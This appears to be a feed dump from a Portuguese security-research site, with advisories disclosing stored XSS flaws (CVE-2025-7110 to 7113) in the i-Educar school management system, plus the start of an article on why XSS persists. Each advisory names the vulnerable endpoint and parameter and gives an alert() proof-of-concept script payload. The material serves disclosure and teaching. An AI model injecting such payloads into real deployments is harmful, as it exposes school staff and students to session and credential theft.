corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7110/ https://www.cvehunters.com/pt/p/cve-2025-7110/ <h2 id="cve-2025-7110-cross-site-scripting-xss-armazenado-no-endpoint-educar_escola_lstphp-parâmetro-escola">CVE-2025-7110: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_escola_lst.php</code> parâmetro <code>Escola</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7110" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7110</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_escola_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Escola</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_escola_lst.php</code></p><h2 id="cve-2025-7110-cross-site-scripting-xss-armazenado-no-endpoint-educar_escola_lstphp-parâmetro-escola">CVE-2025-7110: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_escola_lst.php</code> parâmetro <code>Escola</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7110" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7110</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_escola_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Escola</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_escola_lst.php</code></p> <p>Parâmetro: <code>Escola</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Escola</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7110/image.png" width="1886" height="996" srcset="/p/cve-2025-7110/image_hu_b07da12df38ab222.png 480w, /p/cve-2025-7110/image_hu_ea38d215407e28e3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <p><img src="/p/cve-2025-7110/image-1.png" width="1805" height="970" srcset="/p/cve-2025-7110/image-1_hu_eba69eb637b93ae8.png 480w, /p/cve-2025-7110/image-1_hu_e69951c2ec55d9fb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="186" data-flex-basis="446px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/N3pu_GJHjCw" target="_blank" rel="noopener" >https://youtu.be/N3pu_GJHjCw</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7111/ https://www.cvehunters.com/pt/p/cve-2025-7111/ <h2 id="cve-2025-7111-cross-site-scripting-xss-armazenado-no-endpoint-educar_curso_detphp-parâmetro-curso">CVE-2025-7111: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_curso_det.php</code> parâmetro <code>Curso</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7111" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7111</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_curso_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Curso</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_curso_det.php?cod_curso=ID</code></p><h2 id="cve-2025-7111-cross-site-scripting-xss-armazenado-no-endpoint-educar_curso_detphp-parâmetro-curso">CVE-2025-7111: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_curso_det.php</code> parâmetro <code>Curso</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7111" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7111</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_curso_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Curso</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_curso_det.php?cod_curso=ID</code></p> <p>Parâmetro: <code>Curso</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Curso</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7111/image.png" width="1845" height="985" srcset="/p/cve-2025-7111/image_hu_789b98f8f3f54c8b.png 480w, /p/cve-2025-7111/image_hu_745ad6b2ae48e3f3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7111/image-1.png" width="1754" height="876" srcset="/p/cve-2025-7111/image-1_hu_1ed9a19b48325f7f.png 480w, /p/cve-2025-7111/image-1_hu_8894ad2a5a40a977.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="480px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/NtkxXKrSa6o" target="_blank" rel="noopener" >https://youtu.be/NtkxXKrSa6o</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7112/ https://www.cvehunters.com/pt/p/cve-2025-7112/ <h2 id="cve-2025-7112-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_detphp-parâmetro-funcao">CVE-2025-7112: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_funcao_det.php</code> parâmetro <code>Funcao</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7112" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7112</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_funcao_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Funcao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_funcao_det.php?cod_funcao=COD&ref_cod_instituicao=COD</code></p><h2 id="cve-2025-7112-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_detphp-parâmetro-funcao">CVE-2025-7112: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_funcao_det.php</code> parâmetro <code>Funcao</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7112" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7112</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_funcao_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Funcao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_funcao_det.php?cod_funcao=COD&ref_cod_instituicao=COD</code></p> <p>Parâmetro: <code>Funcao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Funcao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7112/image.png" width="1830" height="977" srcset="/p/cve-2025-7112/image_hu_c648a8cea385efc9.png 480w, /p/cve-2025-7112/image_hu_5f86e83fa1837d9b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7112/image-1.png" width="1811" height="1013" srcset="/p/cve-2025-7112/image-1_hu_cc5ec209f8eaa4ed.png 480w, /p/cve-2025-7112/image-1_hu_9104ce786d725fe2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="178" data-flex-basis="429px" /></p> <p><img src="/p/cve-2025-7112/image-2.png" width="1761" height="929" srcset="/p/cve-2025-7112/image-2_hu_c89aaa0af0099f1c.png 480w, /p/cve-2025-7112/image-2_hu_f51184360f4e8d6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/R6vJIZnjdmE" target="_blank" rel="noopener" >https://youtu.be/R6vJIZnjdmE</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7113/ https://www.cvehunters.com/pt/p/cve-2025-7113/ <h2 id="cve-2025-7113-cross-site-scripting-xss-armazenado-no-endpoint-educar_componente_curricular_lstphp-parâmetro-nome">CVE-2025-7113: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_componente_curricular_lst.php</code> parâmetro <code>Nome</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7113" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7113</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_componente_curricular_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/module/ComponenteCurricular/edit?id=ID</code></p><h2 id="cve-2025-7113-cross-site-scripting-xss-armazenado-no-endpoint-educar_componente_curricular_lstphp-parâmetro-nome">CVE-2025-7113: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_componente_curricular_lst.php</code> parâmetro <code>Nome</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7113" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7113</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_componente_curricular_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/module/ComponenteCurricular/edit?id=ID</code></p> <p>Parâmetro: <code>Nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7113/image.png" width="1831" height="724" srcset="/p/cve-2025-7113/image_hu_d711a16372c343c4.png 480w, /p/cve-2025-7113/image_hu_607a4f81b3b0b224.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="252" data-flex-basis="606px" /></p> <p><img src="/p/cve-2025-7113/image-1.png" width="1805" height="900" srcset="/p/cve-2025-7113/image-1_hu_3f76544bd7d912b4.png 480w, /p/cve-2025-7113/image-1_hu_3c6daeb8a8f8d93b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="481px" /></p> <p><img src="/p/cve-2025-7113/image-2.png" width="1846" height="872" srcset="/p/cve-2025-7113/image-2_hu_37cd16a8824fe8f6.png 480w, /p/cve-2025-7113/image-2_hu_c5787eb0386ae1dc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="508px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/Dd4RdfomMms" target="_blank" rel="noopener" >https://youtu.be/Dd4RdfomMms</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/articles/xss-nao-esta-morto/ https://www.cvehunters.com/pt/articles/xss-nao-esta-morto/ <h2 id="introdução-xss-ainda">Introdução: “XSS? Ainda?” </h2><p style="text-align: justify;">Em pleno 2025, ainda estamos falando de XSS? Sim, ainda estamos. Mesmo com o uso de frameworks modernos, WAFs inteligentes e uma infinidade de artigos explicando como mitigar essa ameaça, o Cross-Site Scripting (XSS) continua presente, sorrateiro, persistente e muitas vezes negligenciado.</p> <p style="text-align: justify;">O XSS é uma das primeiras vulnerabilidades abordadas em cursos introdutórios de segurança ofensiva e testes de invasão em aplicações web. Com um payload simples, instrutores demonstram como essa falha é trivial de ser explorada, evidenciando o perigo e a facilidade de sua exploração.</p><h2 id="introdução-xss-ainda">Introdução: “XSS? Ainda?” </h2><p style="text-align: justify;">Em pleno 2025, ainda estamos falando de XSS? Sim, ainda estamos. Mesmo com o uso de frameworks modernos, WAFs inteligentes e uma infinidade de artigos explicando como mitigar essa ameaça, o Cross-Site Scripting (XSS) continua presente, sorrateiro, persistente e muitas vezes negligenciado.</p> <p style="text-align: justify;">O XSS é uma das primeiras vulnerabilidades abordadas em cursos introdutórios de segurança ofensiva e testes de invasão em aplicações web. Com um payload simples, instrutores demonstram como essa falha é trivial de ser explorada, evidenciando o perigo e a facilidade de sua exploração.</p> <p style="text-align: justify;">Mas o que é XSS, afinal? De acordo com a <b><a href="https://owasp.org/www-community/attacks/xss/" target="_blank">OWASP</a></b>, ataques de Cross-Site Scripting são um tipo de injeção na qual scripts maliciosos são inseridos em sites vulneráveis. Esses ataques ocorrem quando um invasor usa uma aplicação web para enviar código malicioso, geralmente scripts executados no navegador, para outro usuário. As falhas que tornam esses ataques possíveis são bastante comuns e surgem sempre que uma aplicação web incorpora a entrada do usuário na saída gerada sem realizar a validação ou codificação apropriadas.</p> <p style="text-align: justify;">Também de acordo com a <b><a href="https://owasp.org/www-community/attacks/xss/" target="_blank">OWASP</a></b>, o navegador da vítima não possui mecanismo para distinguir scripts legítimos de maliciosos. Assim, ao receber e executar o código, ele confia que ele veio de uma fonte segura. Como resultado, o invasor pode acessar cookies, tokens de sessão e outras informações confidenciais armazenadas pelo navegador, bem como reescrever o conteúdo da página ou redirecionar o usuário para sites maliciosos disfarçados de legítimos.</p> <p><img src="/articles/xss-nao-esta-morto/image.png" width="462" height="160" srcset="/articles/xss-nao-esta-morto/image_hu_e521a21402f0fae0.png 480w, /articles/xss-nao-esta-morto/image_hu_452c6b4617d6a6e9.png 1024w" loading="lazy" alt="Exemplo simples de payload de XSS para executar mensagem." class="gallery-image" data-flex-grow="288" data-flex-basis="693px" /></p> <h2 id="cve-hunters-vs-xss">CVE-Hunters vs XSS </h2><p style="text-align: justify;">O grupo <b><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank">CVE-Hunters</a></b> foi criado em novembro de 2024 como uma iniciativa conjunta entre alunos e um professor, com um objetivo claro: identificar vulnerabilidades (CVEs) em projetos de código aberto. A proposta era proporcionar aos alunos experiência prática na busca por falhas em ambientes reais, indo além de laboratórios controlados ou desafios de Capture The Flag (CTF).</p> <p style="text-align: justify;">Desde então, o grupo analisou uma ampla gama de projetos, desde pequenos sistemas comunitários até aplicações amplamente utilizadas nos setores público e educacional. Ao longo do caminho, um padrão se destacou: a frequência com que vulnerabilidades de <b>Cross-Site Scripting (XSS)</b> foram encontradas.</p> <p style="text-align: justify;">Essa recorrência levanta uma questão importante: os desenvolvedores pararam de tratar o XSS com a devida seriedade? Apesar de ser uma falha amplamente documentada e conhecida há anos, ela ainda aparece com frequência. Mesmo em organizações com processos de desenvolvimento maduros, vulnerabilidades de XSS continuam a aparecer devido à complexidade dos fluxos de entrada e saída, ao uso de bibliotecas legadas ou à falta de testes contextualizados.</p> <p style="text-align: justify;">Atualmente, o grupo tem <b>135 vulnerabilidades reportadas</b>, <b>53 das quais já foram oficialmente registradas como CVEs</b>. Do total de vulnerabilidades descobertas, <b>104 são do tipo XSS</b>, o que representa uma proporção significativa e preocupante.</p> <p><img src="/articles/xss-nao-esta-morto/1.png" width="1024" height="768" srcset="/articles/xss-nao-esta-morto/1_hu_9cbac253be823803.png 480w, /articles/xss-nao-esta-morto/1_hu_e09f18163500396d.png 1024w" loading="lazy" alt="Tipos de Vulnerabilidades encontradas pelo CVE-Hunters" class="gallery-image" data-flex-grow="133" data-flex-basis="320px" /></p> <p style="text-align: justify;">Foram identificadas 62 ocorrências do tipo armazenado e 42 do tipo refletido, revelando uma distribuição relativamente equilibrada.</p> <p><img src="/articles/xss-nao-esta-morto/2.png" width="1024" height="768" srcset="/articles/xss-nao-esta-morto/2_hu_9d85e2af39ca47f0.png 480w, /articles/xss-nao-esta-morto/2_hu_b7c8b0a71c9c5136.png 1024w" loading="lazy" alt="Quantidade de XSS Armazenado vs Refletido" class="gallery-image" data-flex-grow="133" data-flex-basis="320px" /></p> <p style="text-align: justify;">Essas estatísticas por si só reforçam a ideia de que o XSS ainda é um problema real, frequentemente ignorado durante o desenvolvimento, e que continua a merecer atenção, tanto da comunidade técnica quanto dos desenvolvedores responsáveis ​​por aplicativos em produção.</p> <h2 id="experiência-prática">Experiência prática </h2><p style="text-align: justify;">Você pode estar pensando: "Ok, o grupo <b><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank">CVE-Hunters</a></b> encontrou muitos XSS em projetos de código aberto, mas quem pode dizer que grandes empresas também são vulneráveis?"</p> <p style="text-align: justify;">Vamos fazer um experimento rápido com um dos XSS mais recentes divulgados durante a escrita deste artigo: <b><a href="https://security.paloaltonetworks.com/CVE-2025-0133" target="_blank">CVE-2025-0133</a>.</b> Um XSS refletido nos produtos de gateway e portal GlobalProtect, recursos do PAN-OS da Palo Alto Networks, publicado em 14 de maio de 2025.</p> <p style="text-align: justify;">Com uma simples consulta no Shodan, podemos verificar a estimativa de uso deste produto no mundo.</p> <p><img src="/articles/xss-nao-esta-morto/image-1.png" width="2502" height="572" 